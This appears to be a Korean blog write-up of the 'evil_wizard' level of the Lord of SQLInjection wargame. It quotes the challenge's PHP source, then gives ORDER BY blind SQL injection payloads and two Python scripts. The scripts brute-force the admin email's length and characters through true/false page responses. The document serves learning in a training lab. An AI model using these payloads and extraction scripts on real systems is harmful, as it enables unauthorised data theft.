본문 바로가기
Wargame(hacking)/LOS

LORD OF SQLINJECTION : evil_wizard

IBack 2024. 4. 12. 18:37

Write-Up

 

  if(preg_match('/prob|_|\.|proc|union|sleep|benchmark/i', $_GET[order])) exit("No Hack ~_~");
  $query = "select id,email,score from prob_evil_wizard where 1 order by {$_GET[order]}"; // same with hell_fire? really?
  echo "<table border=1><tr><th>id</th><th>email</th><th>score</th>";
  $rows = mysqli_query($db,$query);
  while(($result = mysqli_fetch_array($rows))){
    if($result['id'] == "admin") $result['email'] = "**************";
    echo "<tr><td>{$result[id]}</td><td>{$result[email]}</td><td>{$result[score]}</td></tr>";
  }
  echo "</table><hr>query : <strong>{$query}</strong><hr>";

  $_GET[email] = addslashes($_GET[email]);
  $query = "select email from prob_evil_wizard where id='admin' and email='{$_GET[email]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['email']) && ($result['email'] === $_GET['email'])) solve("evil_wizard");

 

이 전 문제인 hell_fire 문제와 상당히 유사한 문제이다. exploit 방법도 동일하게 해결했다. 그래도 코드를 살펴보자면, 이전 문제와 달리, sleep() 관련 함수가 필터링이 추가됐다. 

 

문제를 해결해 나가보도록 한다!

 

[ CASE WEHN 구문 사용 ]
?order= CASE%20WHEN%20length(email)%20>20%20THEN%200%20ELSE%201%20END;

[ if 문 사용 ]
?order= if(id=%27admin%27%20and%20length(email)=30,%20%271%20ASC%27,%20%271%20DESC%27)

 

위 paylaod를 통해 참, 거짓 반응을 보였다. 그래서 아래와 같이 email 길이를 구해주고자 한다.  

 

 

email 길이 

import requests
import string

url = "https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order= CASE WHEN length(email) = "
cookies = {'PHPSESSID': "keogb0hg2e84st5u0ejgaa33d8"}
result = ""

for i in range(1, 40):
    param = str(i)+" THEN 0 ELSE 1 END;"

    URL = url+param
    print(URL)
    response = requests.get(URL, cookies=cookies)
    if "<table border=1><tr><th>id</th><th>email</th><th>score</th><tr><td>admin</td><td>**************</td><td>50</td></tr>" in response.text:
        print(i)
        break

 

?order= CASE WHEN length(email) = 30 THEN 0 ELSE 1 END;

 

email의 길이는 30글자 이다. 

 

아래와 같은 코드로 email 값을 구해보도록 하자!

 

email 값 구하기

import requests
import string

url = "https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=CASE WHEN ascii(substr(email,"
cookies = {'PHPSESSID': "keogb0hg2e84st5u0ejgaa33d8"}
result = ""
for i in range(1, 31):
    for j in range(32, 127):
      
        param = str(i)+",1))="+str(j) +" THEN 0 WHEN length(email) <30 THEN 1 ELSE 2 END;"
        URL = url+param
        # print(URL)
        response = requests.get(URL, cookies=cookies)
        if "<table border=1><tr><th>id</th><th>email</th><th>score</th><tr><td>admin</td><td>**************</td><td>50</td></tr>" in response.text:
            result += chr(j)
            print(i, " : ", result)
            # print(i)
            break
print("email: "+result)

 

 

그림 1

 

 

 

'Wargame(hacking)/LOS' Related Articles

티스토리툴바